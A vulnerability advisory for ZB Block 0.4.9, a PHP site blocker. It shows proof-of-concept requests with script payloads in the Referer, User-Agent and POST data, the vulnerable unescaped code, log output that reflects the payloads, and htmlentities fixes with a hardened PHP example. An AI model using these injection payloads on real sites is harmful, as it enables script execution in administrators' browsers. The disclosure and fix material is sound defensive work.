ZB Block Cross Site Scripting

Posted on 06 March 2012

--------------------------------------------------------------------------------
Vulnerable Software:
// ZAPHOD BREEBLEBROX'S BLOCKER A.K.A. ZB BLOCK
// VERSION 0.4.9 Final "Jaguar" 0.4.9_Final
Developed by HTTP://WWW.SPAMBOTSECURITY.COM
--------------------------------------------------------------------------------
Severity: *Low*
--------------------------------------------------------------------------------
Vulnerability Description: XSS (Cross Site Scripting vulnerabilities)
--------------------------------------------------------------------------------
Found by: AkaStep
--------------------------------------------------------------------------------
Description:
ZB Block is distributed under the GNU/GPL Version 2 License. Its main goal is to
act as a "honeypot" on your site and block intrusions.
For more info: SPAMBOTSECURITY.COM
--------------------------------------------------------------------------------
Vulnerability Desc:
Because ZB Block "trusts" HTTP_USER_AGENT and HTTP_REFERER, it is vulnerable to a
non-persistent cross site scripting vulnerability. It also logs attacks, so these
unsanitized variables are written to killed_log.txt, which may later act as a
persistent cross site scripting vulnerability against the admin.
--------------------------------------------------------------------------------
Proof of Concept:

==================== Triggering an attack against a site protected by ZB Block ====================

cmd> GET /myfiles/10/zbblock/hackme.php?id=<script>alert("Is it safe?");</script> HTTP/1.0
cmd> Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
cmd> Referer: http://microshit.attacks/you?id=<script>alert("Pwn using Referer");</script>
cmd> User-Agent: <script>alert("Pwn Using user Agent");</script>
cmd> Host: 192.168.0.15
cmd>
hdr> HTTP/1.1 403 FORBIDDEN
hdr> Date: Mon, 05 Mar 2012 13:36:51 GMT
hdr> Server: Apache
hdr> Status: 403 FORBIDDEN
hdr> Warning: 199 192.168.0.15:80 You_are_abusive/hacking/spamming_192.168.0.15
hdr> Abuse: Your connection is not welcome due to: http javascript (wedge end/script start) injection. XSS attack obfuscation. http javascript (wedge end/script start) injection. http javascript (wedge start/script end) injection. http javascript (wedge end/script start) injection. http javascript (wedge start/script end) injection.
hdr> Content-Length: 3890
hdr> Content-Type: text/html
RequestDone Error = 0 StatusCode = 403
================= END OF REQUEST ======================================

Response (note that it does not touch HTTP_REFERER and HTTP_USER_AGENT: both come
back exactly as sent, without any sanitization):

--------------------------------- SNIPPET GOES ---------------------------------
<strong><font color="#0000FF">Record #:</font></strong> 1<br>
<strong><font color="#0000FF">Time:</font></strong> Mon, 05 Mar 2012 13:36:51 +0000<br>
<strong><font color="#0000FF">Running:</font></strong> 0.4.9_Final<br>
<strong><font color="#0000FF">Host:</font></strong> labmachine.mshome.net<br>
<strong><font color="#0000FF">IP:</font></strong> 192.168.0.1<br>
<strong><font color="#0000FF">Post:</font></strong> <br>
<strong><font color="#0000FF">Query:</font></strong> id=<script>alert("Is<br>
<strong><font color="#0000FF">Stripped Query:</font></strong> id=<script>alert("is<br>
<strong><font color="#0000FF">Referer:</font></strong> http://microshit.attacks/you?id=<script>alert("pwn using referer");</script><br>
<strong><font color="#0000FF">User Agent:</font></strong> <script>alert("Pwn Using user Agent");</script><br>
<strong><font color="#0000FF">Reconstructed URL:</font></strong> http:// 192.168.0.15 /myfiles/10/zbblock/hackme.php?id=<script>alert("Is<br>
<br>&nbsp;&nbsp;&nbsp;&nbsp;Generated by <a href="http://www.spambotsecurity.com/zbblock.php" >ZB Block 0.4.9_Final</a></p>
</body>
</html>
--------------------------------- END OF SNIPPET ---------------------------------

Print Screen: http://i009.radikal.ru/1203/71/7d0fd71f5c5d.png

/*------------------------------ VULNERABLE CODE ------------------------------*/
//zbblock.php
// LINE NO 455 && 459
if(isset($_SERVER['HTTP_REFERER'])){$fromhost2=@$_SERVER['HTTP_REFERER'];}
$fromhost=strtolower($fromhost2);
$fromhostsws=preg_replace('/\s+/','',$fromhost);
$fromhostsws=preg_replace("/[^\x9\xA\xD\x20-\x7F]/",'',$fromhostsws);
if(isset($_SERVER['HTTP_USER_AGENT'])){$useragent=@$_SERVER['HTTP_USER_AGENT'];}
$lcuseragent=strtolower($useragent);
$lcuseragentsws=preg_replace('/\s+/','',$lcuseragent);
$lcuseragentsws=preg_replace("/[^\x9\xA\xD\x20-\x7F]/",'',$lcuseragentsws);
/*--------------------------- END OF VULNERABLE CODE ---------------------------*/

By default this script writes a log file:
filename: killed_log.txt
Exists in: {zbblockWHERE_INSTALLED}/vault/killed_log.txt
It is not readable over HTTP, because access to that directory is protected by
.htaccess (Deny from all).

OK, let's look at its content after triggering the attack:
--------------------------------------------------------------------------------
# cat -n killed_log.txt|less
     1  <?php die(''); ?>
     2
     3  #: 1 @: Mon, 05 Mar 2012 13:36:09 +0000 Running: 0.4.9_Final
     4  Host: labmachine.mshome.net
     5  IP: 192.168.0.1
     6  Score: 6
     7  Violation count: 0
     8  Why blocked: http javascript (wedge end/script start) injection. XSS attack obfuscation. http javascript (wedge end/script start) injection. http javascript (wedge start/script end) injection. http javascript (wedge end/script start) injection. http javascript (wedge start/script end) injection.
     9  Query: id=<ScRiPt>AlErT("Not
    10  Referer: http://microshit.attacks/you?id=<script>alert("pwn using referer");</script>
    11  User Agent: <script>alert("Pwn Using user Agent");</script>
    12  Reconstructed URL: http:// 192.168.0.15 /myfiles/10/zbblock/hackme.php?id=<ScRiPt>AlErT("Not
    13
    14  #: 1 @: Mon, 05 Mar 2012 13:36:51 +0000 Running: 0.4.9_Final
    15  Host: labmachine.mshome.net
    16  IP: 192.168.0.1
    17  Score: 6
    18  Violation count: 1
    19  Why blocked: http javascript (wedge end/script start) injection. XSS attack obfuscation. http javascript (wedge end/script start) injection. http javascript (wedge start/script end) injection. http javascript (wedge end/script start) injection. http javascript (wedge start/script end) injection.
    20  Query: id=<script>alert("Is
    21  Referer: http://microshit.attacks/you?id=<script>alert("pwn using referer");</script>
    22  User Agent: <script>alert("Pwn Using user Agent");</script>
    23  Reconstructed URL: http:// 192.168.0.15 /myfiles/10/zbblock/hackme.php?id=<script>alert("Is
    24
--------------------------------------------------------------------------------

As you can see:
    10  Referer: http://microshit.attacks/you?id=<script>alert("pwn using referer");</script>
    11  User Agent: <script>alert("Pwn Using user Agent");</script>
    21  Referer: http://microshit.attacks/you?id=<script>alert("pwn using referer");</script>
    22  User Agent: <script>alert("Pwn Using user Agent");</script>
Same as the original. In future this may cause problems for the site administrator.
Can't, because it is a .txt file and protected by .htaccess? :)
This gives us a small advantage to catch the site admin and automatically trigger
our XSS attack: there is a chance the admin will read that file using some
"reader script", believing that killed_log.txt is safe. For example:
--------------------------------------------------------------------------------
<?php echo '<pre>' . file_get_contents('./vault/killed_log.txt') . '</pre>'; ?>
--------------------------------------------------------------------------------
So there is a chance to execute our JavaScript (HTML) in the context of the
admin's browser.

The fix is simple: the ZB Block developer(s) should note that HTTP_USER_AGENT and
HTTP_REFERER are not "trust"-able and may be spoofed or injected easily.
So htmlentities() or strip_tags() are our best friends in this case :)

------------------------------------- FIX 1 -------------------------------------
//zbblock.php
//LINE NO 455
if(isset($_SERVER['HTTP_REFERER'])){$fromhost2=htmlentities(@$_SERVER['HTTP_REFERER']);}
//LINE NO 459
if(isset($_SERVER['HTTP_USER_AGENT'])){$useragent=htmlentities(@$_SERVER['HTTP_USER_AGENT']);}
// END OF
--------------------------------------------------------------------------------

There is also another non-persistent XSS when a POST request intrusion attempt is
detected.

---------------------------------- POST METHOD ----------------------------------
cmd> POST /myfiles/10/zbblock/hackme.php HTTP/1.0
cmd> Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
cmd> Referer: http://192.168.0.15/myfiles/10/zbblock/hackme.php
cmd> Content-Type: application/x-www-form-urlencoded
cmd> Host: 192.168.0.15
cmd> Content-Length: 58
cmd>
hdr> HTTP/1.1 403 FORBIDDEN
hdr> Date: Mon, 05 Mar 2012 17:53:01 GMT
hdr> Server: Apache
hdr> Status: 403 FORBIDDEN
hdr> Warning: 199 192.168.0.15:80 You_are_abusive/hacking/spamming_192.168.0.15
hdr> Abuse: Your connection is not welcome due to: POST JS POST-058. POST JS POST-059.
hdr> Content-Length: 3548
hdr> Content-Type: text/html
RequestDone Error = 0 StatusCode = 403
POSTDATA: f=<script>alert("Pwned");</script>&fupl=G%F6nd%26%23601%3Br%21
// Note that our payload is not URL-encoded.
--------------------------------------------------------------------------------
Response:
----------------------------------- SNIPPET -----------------------------------
<strong><font color="#0000FF">Post:</font></strong> f=<script>alert("Pwned");</script>&fupl=G%F6nd%26%23601%3Br%21<br>
-------------------------------- END OF SNIPPET --------------------------------
--------------------------------------------------------------------------------

So why does this occur? Again, let's look at the code:
------------------------------- VULNERABLE CODE -------------------------------
//zbblock.php
// Line no: 856
<strong><font color="#0000FF">Post:</font></strong> ' . $rawpost . '<br>
--------------------------------------------------------------------------------
//And if we look up at line no: 472
$rawpost=file_get_contents("php://input"); //No sanitization again

/*------------------------------------------------------------------------------
Since the POST data is not logged to killed_log.txt and is only printed to the
client side, on line 855 we can use:
<strong><font color="#0000FF">Post:</font></strong> ' . htmlentities($rawpost) . '<br>

This also applies to line no: 838
$dummy = $ini['e_mail'] . '?subject=Event ID:#' . $zbcounter . ' on ' . $thishost . '&body=' . htmlentities($dummy);
------------------------------------- EOF -------------------------------------*/

/AkaStep ^_^ 1330959272
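The added example below is not part of this advisory or of ZB Block's own code: it puts the unescaped record rendering next to its escaped form and gives a safe version of the admin "reader script" shown above. The $rec keys and the esc() helper are assumptions made for the example; escaping is done on output rather than at capture time so the raw header text stays available to the signature checks that run on it earlier in zbblock.php.

```php
<?php
// Added example, not ZB Block's own code: escape request-controlled values at the
// point where they are written into HTML, and read killed_log.txt safely.
// The $rec keys and the esc() helper are assumptions made for this example.

function esc(string $v): string {
    // ENT_QUOTES covers both quote styles; ENT_SUBSTITUTE keeps invalid UTF-8 from
    // silently emptying the output, which would hide the offending value from the log.
    return htmlentities($v, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Vulnerable form, as zbblock.php does it: raw values concatenated into the markup.
function record_html_unsafe(array $rec): string {
    return '<strong>Referer:</strong> ' . $rec['referer'] . '<br>'
         . '<strong>User Agent:</strong> ' . $rec['useragent'] . '<br>'
         . '<strong>Post:</strong> ' . $rec['rawpost'] . '<br>';
}

// Hardened form: identical layout, every request-controlled value escaped on output.
// Escaping here rather than at capture time keeps the raw header text available to
// the signature checks that run on $fromhost / $lcuseragent earlier in the script.
function record_html_safe(array $rec): string {
    return '<strong>Referer:</strong> ' . esc($rec['referer']) . '<br>'
         . '<strong>User Agent:</strong> ' . esc($rec['useragent']) . '<br>'
         . '<strong>Post:</strong> ' . esc($rec['rawpost']) . '<br>';
}

// Safe replacement for the admin "reader script": the log is plain text, so escape
// all of it before wrapping it in <pre>; the PHP guard line is then shown literally.
function view_log_safe(string $path): string {
    $raw = @file_get_contents($path);
    if ($raw === false) {
        return '<pre>(log not readable)</pre>';
    }
    return '<pre>' . esc($raw) . '</pre>';
}

// True when the rendered HTML still carries an executable tag from the input.
function has_raw_script(string $html): bool {
    return stripos($html, '<script') !== false;
}

// Constructed sample record built from the payload strings shown in the advisory.
$rec = [
    'referer'   => 'http://microshit.attacks/you?id=<script>alert("pwn using referer");</script>',
    'useragent' => '<script>alert("Pwn Using user Agent");</script>',
    'rawpost'   => 'f=<script>alert("Pwned");</script>&fupl=G%F6nd%26%23601%3Br%21',
];
echo 'unsafe render still scriptable: ', var_export(has_raw_script(record_html_unsafe($rec)), true), "\n";
echo 'safe render scriptable:         ', var_export(has_raw_script(record_html_safe($rec)), true), "\n";
```

Pointing view_log_safe() at vault/killed_log.txt replaces the one-line reader from the advisory without changing what the admin sees beyond the tags being rendered as text.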